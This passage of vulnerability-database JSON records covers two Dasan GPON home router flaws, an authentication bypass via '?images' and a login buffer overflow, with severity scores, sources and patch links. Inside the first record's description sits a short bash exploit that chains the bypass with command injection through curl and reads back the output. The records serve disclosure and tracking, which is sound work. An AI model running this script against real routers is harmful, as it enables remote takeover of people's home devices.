"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-10561",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-10561",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2018-10561",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2018-10561",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2018-09230",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201805-189",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-120333",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2018-10561",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09230"
},
{
"db": "VULHUB",
"id": "VHN-120333"
},
{
"db": "VULMON",
"id": "CVE-2018-10561"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-189"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004885"
},
{
"db": "NVD",
"id": "CVE-2018-10561"
},
{
"db": "NVD",
"id": "CVE-2018-10561"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered on Dasan GPON home routers. It is possible to bypass authentication simply by appending \"?images\" to any URL of the device that requires authentication, as demonstrated by the /menu.html?images/ or /GponForm/diag_FORM?images/ URI. One can then manage the device. Dasan GPON home router Contains an authentication vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. An attacker could exploit the vulnerability by bypassing the vulnerability by adding \\342\\200\\230?images\\342\\200\\231 to any of the device\u0027s URLs. Multiple Dasan GPON Routers is prone to an authentication-bypass vulnerability and a command-injection vulnerability. \nAn attacker can exploit these issues to bypass authentication or execute arbitrary commands in the context of the affected device. #!/bin/bash\n \necho \"[+] Sending the Commanda| \"\n# We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices\ncurl -k -d \"XWebPageName=diag\u0026diag_action=ping\u0026wan_conlist=0\u0026dest_host=\\`$2\\`;$2\u0026ipv=0\" $1/GponForm/diag_Form?images/ 2\u003e/dev/null 1\u003e/dev/null\necho \"[+] Waitinga|.\"\nsleep 3\necho \"[+] Retrieving the ouputa|.\"\ncurl -k $1/diag.html?images/ 2\u003e/dev/null | grep adiag_result = a | sed -e as/\\\\n/\\n/ga\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-10561"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004885"
},
{
"db": "CNVD",
"id": "CNVD-2018-09230"
},
{
"db": "BID",
"id": "107053"
},
{
"db": "VULHUB",
"id": "VHN-120333"
},
{
"db": "VULMON",
"id": "CVE-2018-10561"
},
{
"db": "PACKETSTORM",
"id": "147482"
}
],
"trust": 2.7
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-120333",
"trust": 0.1,
"type": "unknown"
},
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=44576",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120333"
},
{
"db": "VULMON",
"id": "CVE-2018-10561"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-10561",
"trust": 3.6
},
{
"db": "EXPLOIT-DB",
"id": "44576",
"trust": 3.2
},
{
"db": "BID",
"id": "107053",
"trust": 2.1
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004885",
"trust": 0.8
},
{
"db": "EXPLOITDB",
"id": "44576",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2018-09230",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201805-189",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "147482",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-120333",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2018-10561",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09230"
},
{
"db": "VULHUB",
"id": "VHN-120333"
},
{
"db": "VULMON",
"id": "CVE-2018-10561"
},
{
"db": "BID",
"id": "107053"
},
{
"db": "PACKETSTORM",
"id": "147482"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-189"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004885"
},
{
"db": "NVD",
"id": "CVE-2018-10561"
}
]
},
"id": "VAR-201805-0262",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09230"
},
{
"db": "VULHUB",
"id": "VHN-120333"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09230"
}
]
},
"last_update_date": "2025-11-18T15:27:33.670000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.dasannetworks.com/en/"
},
{
"title": "GPONHomeRouters security bypass vulnerability patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/128597"
},
{
"title": "Dasan GPON Home router security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=79885"
},
{
"title": "Brocade Security Advisories: BSA-2018-603",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=brocade_security_advisories\u0026qid=b192ae1777abead866cbeb7d8a56bb12"
},
{
"title": "GPON",
"trust": 0.1,
"url": "https://github.com/manyunya/GPON "
},
{
"title": "GPON",
"trust": 0.1,
"url": "https://github.com/ethicalhackeragnidhra/GPON "
},
{
"title": "CVE-2018-10562",
"trust": 0.1,
"url": "https://github.com/ATpiu/CVE-2018-10562 "
},
{
"title": "GPON-home-routers-Exploit",
"trust": 0.1,
"url": "https://github.com/vhackor/GPON-home-routers-Exploit "
},
{
"title": "GPON",
"trust": 0.1,
"url": "https://github.com/f3d0x0/GPON "
},
{
"title": "GPON",
"trust": 0.1,
"url": "https://github.com/Truongnn92/GPON "
},
{
"title": "underattack-py",
"trust": 0.1,
"url": "https://github.com/underattack-today/underattack-py "
},
{
"title": "Sniper",
"trust": 0.1,
"url": "https://github.com/samba234/Sniper "
},
{
"title": "Kn0ck",
"trust": 0.1,
"url": "https://github.com/telnet22/Kn0ck "
},
{
"title": "Sn1per",
"trust": 0.1,
"url": "https://github.com/unusualwork/Sn1per "
},
{
"title": "Sn1per",
"trust": 0.1,
"url": "https://github.com/oneplus-x/Sn1per "
},
{
"title": "api.greynoise.io",
"trust": 0.1,
"url": "https://github.com/GreyNoise-Intelligence/api.greynoise.io "
},
{
"title": "Exp101tsArchiv30thers",
"trust": 0.1,
"url": "https://github.com/nu11secur1ty/Exp101tsArchiv30thers "
},
{
"title": "awesome-cve-poc_qazbnm456",
"trust": 0.1,
"url": "https://github.com/xbl3/awesome-cve-poc_qazbnm456 "
},
{
"title": "PoC-in-GitHub",
"trust": 0.1,
"url": "https://github.com/hectorgie/PoC-in-GitHub "
},
{
"title": "CVE-POC",
"trust": 0.1,
"url": "https://github.com/0xT11/CVE-POC "
},
{
"title": "PoC-in-GitHub",
"trust": 0.1,
"url": "https://github.com/nomi-sec/PoC-in-GitHub "
},
{
"title": "Threatpost",
"trust": 0.1,
"url": "https://threatpost.com/gafgyt-botnet-ddos-mirai/165424/"
},
{
"title": "Threatpost",
"trust": 0.1,
"url": "https://threatpost.com/d-link-iot-tor-gafgyt-variant/164529/"
},
{
"title": "Threatpost",
"trust": 0.1,
"url": "https://threatpost.com/inside-hoaxcalls-botnet-success-failure/156107/"
},
{
"title": "Threatpost",
"trust": 0.1,
"url": "https://threatpost.com/wicked-botnet-uses-passel-of-exploits-to-target-iot/132125/"
},
{
"title": "BleepingComputer",
"trust": 0.1,
"url": "https://www.bleepingcomputer.com/news/security/gpon-routers-attacked-with-new-zero-day/"
},
{
"title": "Threatpost",
"trust": 0.1,
"url": "https://threatpost.com/millions-of-home-fiber-routers-vulnerable-to-complete-takeover/131593/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09230"
},
{
"db": "VULMON",
"id": "CVE-2018-10561"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-189"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004885"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-287",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120333"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004885"
},
{
"db": "NVD",
"id": "CVE-2018-10561"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.3,
"url": "https://www.exploit-db.com/exploits/44576/"
},
{
"trust": 2.5,
"url": "http://www.securityfocus.com/bid/107053"
},
{
"trust": 2.1,
"url": "https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/"
},
{
"trust": 1.0,
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=cve-2018-10561"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10561"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-10561"
},
{
"trust": 0.3,
"url": "http://www.dasannetworks.com/en/"
},
{
"trust": 0.3,
"url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2018-603"
},
{
"trust": 0.3,
"url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2018-604"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/287.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/manyunya/gpon"
},
{
"trust": 0.1,
"url": "https://github.com/atpiu/cve-2018-10562"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10562"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09230"
},
{
"db": "VULHUB",
"id": "VHN-120333"
},
{
"db": "VULMON",
"id": "CVE-2018-10561"
},
{
"db": "BID",
"id": "107053"
},
{
"db": "PACKETSTORM",
"id": "147482"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-189"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004885"
},
{
"db": "NVD",
"id": "CVE-2018-10561"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-09230"
},
{
"db": "VULHUB",
"id": "VHN-120333"
},
{
"db": "VULMON",
"id": "CVE-2018-10561"
},
{
"db": "BID",
"id": "107053"
},
{
"db": "PACKETSTORM",
"id": "147482"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-189"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004885"
},
{
"db": "NVD",
"id": "CVE-2018-10561"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-05-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-09230"
},
{
"date": "2018-05-04T00:00:00",
"db": "VULHUB",
"id": "VHN-120333"
},
{
"date": "2018-05-04T00:00:00",
"db": "VULMON",
"id": "CVE-2018-10561"
},
{
"date": "2019-02-18T00:00:00",
"db": "BID",
"id": "107053"
},
{
"date": "2018-05-04T00:32:22",
"db": "PACKETSTORM",
"id": "147482"
},
{
"date": "2018-05-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-189"
},
{
"date": "2018-06-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-004885"
},
{
"date": "2018-05-04T03:29:00.227000",
"db": "NVD",
"id": "CVE-2018-10561"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-05-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-09230"
},
{
"date": "2019-03-04T00:00:00",
"db": "VULHUB",
"id": "VHN-120333"
},
{
"date": "2019-03-04T00:00:00",
"db": "VULMON",
"id": "CVE-2018-10561"
},
{
"date": "2019-02-18T00:00:00",
"db": "BID",
"id": "107053"
},
{
"date": "2019-02-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-189"
},
{
"date": "2018-06-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-004885"
},
{
"date": "2025-11-05T19:23:25.363000",
"db": "NVD",
"id": "CVE-2018-10561"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201805-189"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dasan GPON home router Authentication vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-004885"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201805-189"
}
],
"trust": 0.6
}
}
VAR-201801-0924
Vulnerability from variot - Updated: 2024-11-23 22:26Buffer overflow on Dasan GPON ONT WiFi Router H640X 12.02-01121 2.77p1-1124 and 3.03p2-1146 devices allows remote attackers to execute arbitrary code via a long POST request to the login_action function in /cgi-bin/login_action.cgi (aka cgipage.cgi). Dasan GPON ONT WiFi Router H640X The device contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. DasanGPONONTWiFiRouter is a wireless router device from DASANNetworks, Korea. A buffer overflow vulnerability exists in DasanGPONONTWiFiRouterH640X12.02-0112, 2.77p1-1124, and 3.03p2-1146
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201801-0924",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "h640x",
"scope": "eq",
"trust": 1.6,
"vendor": "dasannetworks",
"version": "3.03p2-1146"
},
{
"model": "h640x",
"scope": "eq",
"trust": 1.6,
"vendor": "dasannetworks",
"version": "12.02-01121"
},
{
"model": "h640x",
"scope": "eq",
"trust": 1.6,
"vendor": "dasannetworks",
"version": "2.77p1-1124"
},
{
"model": "h640x",
"scope": "eq",
"trust": 0.8,
"vendor": "dasan",
"version": "12.02-01121"
},
{
"model": "h640x",
"scope": "eq",
"trust": 0.8,
"vendor": "dasan",
"version": "2.77p1-1124"
},
{
"model": "h640x",
"scope": "eq",
"trust": 0.8,
"vendor": "dasan",
"version": "3.03p2-1146"
},
{
"model": "networks dasan gpon ont wifi router h640x",
"scope": "eq",
"trust": 0.6,
"vendor": "dasan",
"version": "12.02-0112"
},
{
"model": "networks dasan gpon ont wifi router 2.77p1-1124",
"scope": null,
"trust": 0.6,
"vendor": "dasan",
"version": null
},
{
"model": "networks dasan gpon ont wifi router 3.03p2-1146",
"scope": null,
"trust": 0.6,
"vendor": "dasan",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-04394"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-012245"
},
{
"db": "CNNVD",
"id": "CNNVD-201801-811"
},
{
"db": "NVD",
"id": "CVE-2017-18046"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:dasannetworks:h640x_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-012245"
}
]
},
"cve": "CVE-2017-18046",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2017-18046",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-04394",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-109129",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2017-18046",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-18046",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2017-18046",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2018-04394",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201801-811",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-109129",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-04394"
},
{
"db": "VULHUB",
"id": "VHN-109129"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-012245"
},
{
"db": "CNNVD",
"id": "CNNVD-201801-811"
},
{
"db": "NVD",
"id": "CVE-2017-18046"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Buffer overflow on Dasan GPON ONT WiFi Router H640X 12.02-01121 2.77p1-1124 and 3.03p2-1146 devices allows remote attackers to execute arbitrary code via a long POST request to the login_action function in /cgi-bin/login_action.cgi (aka cgipage.cgi). Dasan GPON ONT WiFi Router H640X The device contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. DasanGPONONTWiFiRouter is a wireless router device from DASANNetworks, Korea. A buffer overflow vulnerability exists in DasanGPONONTWiFiRouterH640X12.02-0112, 2.77p1-1124, and 3.03p2-1146",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-18046"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-012245"
},
{
"db": "CNVD",
"id": "CNVD-2018-04394"
},
{
"db": "VULHUB",
"id": "VHN-109129"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-18046",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2017-012245",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201801-811",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2018-04394",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-109129",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-04394"
},
{
"db": "VULHUB",
"id": "VHN-109129"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-012245"
},
{
"db": "CNNVD",
"id": "CNNVD-201801-811"
},
{
"db": "NVD",
"id": "CVE-2017-18046"
}
]
},
"id": "VAR-201801-0924",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-04394"
},
{
"db": "VULHUB",
"id": "VHN-109129"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-04394"
}
]
},
"last_update_date": "2024-11-23T22:26:33.464000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.dasannetworks.com/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-012245"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-109129"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-012245"
},
{
"db": "NVD",
"id": "CVE-2017-18046"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.9,
"url": "https://blogs.securiteam.com/index.php/archives/3552"
},
{
"trust": 1.1,
"url": "https://pastebin.com/yxd9s46a"
},
{
"trust": 1.1,
"url": "https://twitter.com/ankit_anubhav/status/982261670394249216"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-18046"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-18046"
},
{
"trust": 0.6,
"url": "https://blogs.securiteam.com/index.php/archives/3552#more"
},
{
"trust": 0.6,
"url": "https://blogs.securiteam.com/index.php/archives/3552#more-3552"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-04394"
},
{
"db": "VULHUB",
"id": "VHN-109129"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-012245"
},
{
"db": "CNNVD",
"id": "CNNVD-201801-811"
},
{
"db": "NVD",
"id": "CVE-2017-18046"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-04394"
},
{
"db": "VULHUB",
"id": "VHN-109129"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-012245"
},
{
"db": "CNNVD",
"id": "CNNVD-201801-811"
},
{
"db": "NVD",
"id": "CVE-2017-18046"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-03-06T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-04394"
},
{
"date": "2018-01-21T00:00:00",
"db": "VULHUB",
"id": "VHN-109129"
},
{
"date": "2018-02-28T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-012245"
},
{
"date": "2018-01-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201801-811"
},
{
"date": "2018-01-21T22:29:00.290000",
"db": "NVD",
"id": "CVE-2017-18046"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-03-06T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-04394"
},
{
"date": "2018-04-08T00:00:00",
"db": "VULHUB",
"id": "VHN-109129"
},
{
"date": "2018-02-28T00:00:00",
"db": "JVNDB",
